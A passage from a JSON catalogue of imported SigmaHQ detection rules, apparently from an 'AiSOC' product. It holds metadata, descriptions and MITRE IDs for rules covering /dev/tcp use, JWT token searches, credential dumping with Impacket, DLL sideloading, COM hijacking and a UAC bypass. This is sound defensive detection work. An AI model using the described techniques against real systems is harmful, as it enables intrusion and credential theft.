"imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-cron-file-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/file_event/file_event_lnx_susp_cron_file_created.yml" } }, { "id": "sigmahq-sigma-6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", "type": "detection", "name": "Powershell XML Execute Command", "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-xml-execute-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml" } }, { "id": "sigmahq-sigma-6c6d9280-e6d0-4b9d-80ac-254701b64916", "type": "detection", "name": "Potential NTLM Coercion Via Certutil.EXE", "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/potential-ntlm-coercion-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml" } }, { "id": "sigmahq-sigma-6c82cf5c-090d-4d57-9188-533577631108", "type": "detection", "name": "Microsoft Malware Protection Engine Crash - WER", "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1211", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-malware-protection-engine-crash-wer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c82cf5c-090d-4d57-9188-533577631108", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/windows_error_reporting/win_application_msmpeng_crash_wer.yml" } }, { "id": "sigmahq-sigma-6c8fbee5-dee8-49bc-851d-c3142d02aa47", "type": "detection", "name": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. 
This can be used to override access restrictions set by previous ACLs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/allow-service-access-using-security-descriptor-tampering-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml" } }, { "id": "sigmahq-sigma-6c96fc76-0eb1-11eb-adc1-0242ac120002", "type": "detection", "name": "Invoke-Obfuscation STDIN+ Launcher", "description": "Detects Obfuscated use of stdin to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-stdin-launcher.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml" } }, { "id": 
"sigmahq-sigma-6cc2b61b-d97e-42ef-a9dd-8aa8dc951657", "type": "detection", "name": "Okta Unauthorized Access to App", "description": "Detects when unauthorized access to app occurs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-unauthorized-access-to-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6cc2b61b-d97e-42ef-a9dd-8aa8dc951657", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_unauthorized_access_to_app.yml" } }, { "id": "sigmahq-sigma-6cc5fceb-9a71-4c23-aeeb-963abe0b279c", "type": "detection", "name": "Suspicious Use of /dev/tcp", "description": "Detects suspicious command with /dev/tcp", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-use-of-dev-tcp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6cc5fceb-9a71-4c23-aeeb-963abe0b279c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_susp_dev_tcp.yml" } }, { "id": "sigmahq-sigma-6d3a3952-6530-44a3-8554-cf17c116c615", "type": "detection", "name": 
"Potentially Suspicious JWT Token Search Via CLI", "description": "Detects potentially suspicious search for JWT tokens via CLI by looking for the string \"eyJ0eX\" or \"eyJhbG\".\nJWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others.\nThreat actors may search for these tokens to steal them for lateral movement or privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-jwt-token-search-via-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6d3a3952-6530-44a3-8554-cf17c116c615", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_jwt_token_search.yml" } }, { "id": "sigmahq-sigma-6d444368-6da1-43fe-b2fc-44202430480e", "type": "detection", "name": "Failed DNS Zone Transfer", "description": "Detects when a DNS zone transfer failed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1590.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/failed-dns-zone-transfer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"6d444368-6da1-43fe-b2fc-44202430480e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml" } }, { "id": "sigmahq-sigma-6d44fb93-e7d2-475c-9d3d-54c9c1e33427", "type": "detection", "name": "BITS Transfer Job With Uncommon Or Suspicious Remote TLD", "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bits-transfer-job-with-uncommon-or-suspicious-remote-tld.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml" } }, { "id": "sigmahq-sigma-6d580420-ff3f-4e0e-b6b0-41b90c787e28", "type": "detection", "name": "SharpHound Recon Sessions", "description": "Detects remote RPC calls used by SharpHound to map remote connections and local group membership.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/sharphound-recon-sessions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6d580420-ff3f-4e0e-b6b0-41b90c787e28", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" } }, { "id": "sigmahq-sigma-6d844f0f-1c18-41af-8f19-33e7654edfc3", "type": "detection", "name": "Cisco Local Accounts", "description": "Find local accounts being created or modified as well as remote authentication configurations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1136.001", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-local-accounts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6d844f0f-1c18-41af-8f19-33e7654edfc3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_local_accounts.yml" } }, { "id": "sigmahq-sigma-6d8a7cf1-8085-423b-b87d-7e880faabbdf", "type": "detection", "name": "File Download Via Nscurl - MacOS", "description": "Detects the execution of the nscurl utility in order to download files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": 
"imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-via-nscurl-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6d8a7cf1-8085-423b-b87d-7e880faabbdf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_nscurl_usage.yml" } }, { "id": "sigmahq-sigma-6d8c3d20-a5e1-494f-8412-4571d716cf5c", "type": "detection", "name": "Communication To Uncommon Destination Ports", "description": "Detects programs that connect to uncommon destination ports", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1571" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/communication-to-uncommon-destination-ports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6d8c3d20-a5e1-494f-8412-4571d716cf5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml" } }, { "id": "sigmahq-sigma-6da2c9f5-7c53-401b-aacb-92c040ce1215", "type": "detection", "name": "Use of W32tm as Timer", "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1124" ], 
"log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-w32tm-as-timer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_w32tm.yml" } }, { "id": "sigmahq-sigma-6daac7fc-77d1-449a-a71a-e6b4d59a0e54", "type": "detection", "name": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-couldn-t-call-a-privileged-service-lsaregisterlogonprocess.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" } }, { "id": "sigmahq-sigma-6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236", "type": "detection", "name": "Winget Admin 
Settings Modification", "description": "Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winget-admin-settings-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_winget_admin_settings_tampering.yml" } }, { "id": "sigmahq-sigma-6ddab845-b1b8-49c2-bbf7-1a11967f64bc", "type": "detection", "name": "File Deleted Via Sysinternals SDelete", "description": "Detects the deletion of files by the Sysinternals SDelete utility. 
It looks for the common name pattern used to rename files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-deleted-via-sysinternals-sdelete.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml" } }, { "id": "sigmahq-sigma-6ddff2e8-ea1a-45d0-8938-93dfc1d67ae7", "type": "detection", "name": "PUA - Restic Backup Tool Execution", "description": "Detects the execution of the Restic backup tool, which can be used for data exfiltration.\nThreat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, including cloud services.\nIf not legitimately used in the enterprise environment, its presence may indicate malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1048", "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-restic-backup-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ddff2e8-ea1a-45d0-8938-93dfc1d67ae7", "source_commit": "df5c6a6", "license": "DRL-1.1", 
"license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_restic.yml" } }, { "id": "sigmahq-sigma-6e22722b-dfb1-4508-a911-49ac840b40f8", "type": "detection", "name": "Suspicious Mstsc.EXE Execution With Local RDP File", "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-mstsc-exe-execution-with-local-rdp-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" } }, { "id": "sigmahq-sigma-6e2a900a-ced9-4e4a-a9c2-13e706f9518a", "type": "detection", "name": "HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump", "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/hacktool-potential-remote-credential-dumping-activity-via-crackmapexec-or-impack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_remote_cred_dump.yml" } }, { "id": "sigmahq-sigma-6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4", "type": "detection", "name": "Suspicious Execution via macOS Script Editor", "description": "Detects when the macOS Script Editor utility spawns an unusual child process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566", "T1566.002", "T1059", "T1059.002", "T1204", "T1204.001", "T1553" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-via-macos-script-editor.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml" } }, { "id": "sigmahq-sigma-6e61ee20-ce00-4f8d-8aee-bedd8216f7e3", "type": "detection", "name": "AWS GuardDuty Important Change", "description": "Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.", "version": "1.0.0", "author": 
"AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-guardduty-important-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e61ee20-ce00-4f8d-8aee-bedd8216f7e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_guardduty_disruption.yml" } }, { "id": "sigmahq-sigma-6e78b74f-c762-4800-82ad-f66787f10c8a", "type": "detection", "name": "Potential Rcdll.DLL Sideloading", "description": "Detects potential DLL sideloading of rcdll.dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-rcdll-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e78b74f-c762-4800-82ad-f66787f10c8a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_rcdll.yml" } }, { "id": "sigmahq-sigma-6e78f90f-0043-4a01-ac41-f97681613a66", "type": "detection", "name": "OpenCanary - MSSQL Login Attempt Via Windows Authentication", "description": "Detects instances where an MSSQL service on an OpenCanary node has had a login attempt 
using Windows Authentication.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1213" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-mssql-login-attempt-via-windows-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e78f90f-0043-4a01-ac41-f97681613a66", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_mssql_login_winauth.yml" } }, { "id": "sigmahq-sigma-6e8fe0a8-ba0b-4a93-8f9e-82657e7a5984", "type": "detection", "name": "BaaUpdate.exe Suspicious DLL Load", "description": "Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM & COM Hijacking.\nThis technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94)\nwhich can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. 
This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/baaupdate-exe-suspicious-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e8fe0a8-ba0b-4a93-8f9e-82657e7a5984", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_susp_baaupdate_dll_load.yml" } }, { "id": "sigmahq-sigma-6e90ae7a-7cd3-473f-a035-4ebb72d961da", "type": "detection", "name": "PCRE.NET Package Temp Files", "description": "Detects processes creating temp files related to PCRE.NET package", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pcre-net-package-temp-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml" } }, { "id": 
"sigmahq-sigma-6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", "type": "detection", "name": "Uncommon Link.EXE Parent Process", "description": "Detects an uncommon parent process of \"LINK.EXE\".\nLink.EXE is the Microsoft incremental linker. It's a utility usually bundled with a Visual Studio installation.\nMultiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcoded call to the \"LINK.EXE\" binary without checking its validity.\nThis would allow an attacker to sideload any binary with the name \"link.exe\" if one of the aforementioned tools gets executed from a different location.\nBy filtering the known locations of such utilities we can spot uncommon parent processes of LINK.EXE that might be suspicious or malicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-link-exe-parent-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_link_uncommon_parent_process.yml" } }, { "id": "sigmahq-sigma-6ea3bf32-9680-422d-9f50-e90716b12a66", "type": "detection", "name": "UAC Bypass Via Wsreset", "description": "Unfixed method for UAC bypass from Windows 10. WSReset.exe is a file associated with the Windows Store. 
